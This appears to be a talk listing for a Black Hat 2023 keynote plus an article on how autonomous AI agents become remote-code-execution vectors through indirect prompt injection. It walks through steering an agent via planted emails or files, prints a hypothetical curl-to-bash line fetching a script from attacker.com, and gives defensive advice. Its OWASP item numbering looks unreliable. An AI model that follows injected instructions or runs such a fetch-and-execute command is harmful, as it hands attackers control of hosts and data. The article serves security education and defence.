Black Hat2023

The Future of AI Security

Black Hat6,023 views61:25about 2 years ago

This keynote explores the security implications of integrating large language models (LLMs) and autonomous AI agents into enterprise environments. It highlights the risks of indirect prompt injection, data exfiltration, and the non-deterministic nature of AI systems. The talk emphasizes the need for new threat modeling approaches and the development of explainable AI to secure these evolving technologies. It also announces the DARPA AI Cyber Challenge (AIxCC) to foster innovation in automated vulnerability detection and remediation.

The New Attack Surface: Why Your AI Agent is a Remote Code Execution Vector

TLDR: Autonomous AI agents are rapidly being integrated into enterprise workflows, but they introduce critical security risks like indirect prompt injection and unauthorized data exfiltration. These agents act as privileged users, capable of executing code and accessing sensitive internal systems based on non-deterministic inputs. Security teams must treat AI agent configurations as high-value targets and implement strict authorization boundaries to prevent these systems from becoming automated backdoors.

Integration of Large Language Models (LLMs) into enterprise environments has moved far beyond simple chatbots. We are now seeing the deployment of autonomous agents that can interact with internal APIs, fetch data from private databases, and execute code on host systems. This shift from passive information retrieval to active, autonomous task execution creates a massive, poorly understood attack surface. If you are a pentester or a researcher, your next target is not just the web application; it is the agent orchestrating the backend.

The Mechanics of Agent-Based Exploitation

Traditional web security focuses on user-supplied input. With autonomous agents, the input vector is significantly more complex. These systems are designed to be "goal-oriented," meaning they break down a high-level objective into a series of sub-tasks. An attacker does not need to compromise the agent's core logic; they only need to influence the agent's decision-making process through indirect prompt injection.

Consider an agent configured to assist with project management. It has access to your email, your Jira instance, and your local file system. If an attacker can force this agent to process a malicious payload—perhaps hidden in an email attachment or a public-facing document—the agent may interpret that payload as a set of instructions. Because the agent operates with the privileges of the service account it is running under, it can perform actions that would normally require human intervention.

From Prompt Injection to System Compromise

The risk here is not just data leakage; it is full-blown remote code execution. If an agent is tasked with "setting up a development environment," it might be authorized to install packages or run scripts. An attacker who successfully injects instructions into the agent's workflow can redirect it to download and execute arbitrary code.

For example, if an agent uses a library to interact with a system, an attacker might influence the agent to execute a command like this:

# Hypothetical payload targeting an agent's execution environment
curl -s http://attacker.com/malicious_script.sh | bash

The agent, believing it is fulfilling a legitimate sub-task to "configure the environment," executes the command. This is not a bug in the code; it is a failure of the agent's authorization model. The agent lacks the context to distinguish between a legitimate request and a malicious one because it treats all retrieved data as trusted input.

Testing the Agentic Workflow

During a penetration test, you should focus on the agent's "tool use" capabilities. Identify which APIs the agent can call and what data it can access. If the agent can fetch content from the internet, you have a direct path for indirect prompt injection.

Start by mapping the agent's capabilities. Does it have access to a vector database? Can it read files from a specific directory? Once you understand the agent's reach, attempt to influence its next action. If you can control the content of a file or an email that the agent is likely to process, you can begin to chain together commands. The goal is to move the agent from its intended path to your malicious one.

Securing the Agentic Perimeter

Defending against these threats requires a fundamental shift in how we handle authorization. You cannot rely on traditional perimeter security when the agent itself is the bridge between the internet and your internal infrastructure.

Implement the principle of least privilege at the agent level. If an agent does not need to execute shell commands, ensure the service account it runs under has no permissions to invoke sh or bash. Use OWASP Top 10 for LLM Applications as a baseline for your threat modeling. Specifically, focus on A03: Indirect Prompt Injection. You must assume that any data the agent fetches from an external source is potentially malicious and design your authorization boundaries accordingly.

The Road Ahead

The industry is currently in a "move fast and break things" phase with AI integration, which is exactly where we were with mobile devices a decade ago. We are seeing the same pattern: rapid adoption of new functionality followed by a slow, painful realization that the underlying architecture is fundamentally insecure.

For those of us in the security community, this is an opportunity. We have the chance to define the security standards for these autonomous systems before they become as ubiquitous and as vulnerable as the early smartphone ecosystem. Start by treating every AI agent as a potential entry point. If you are not already threat modeling your organization's AI agents, you are already behind. The next major breach will likely not be a simple SQL injection; it will be an autonomous agent that was tricked into doing the attacker's work for them.

Talk Type

keynote

Difficulty

beginner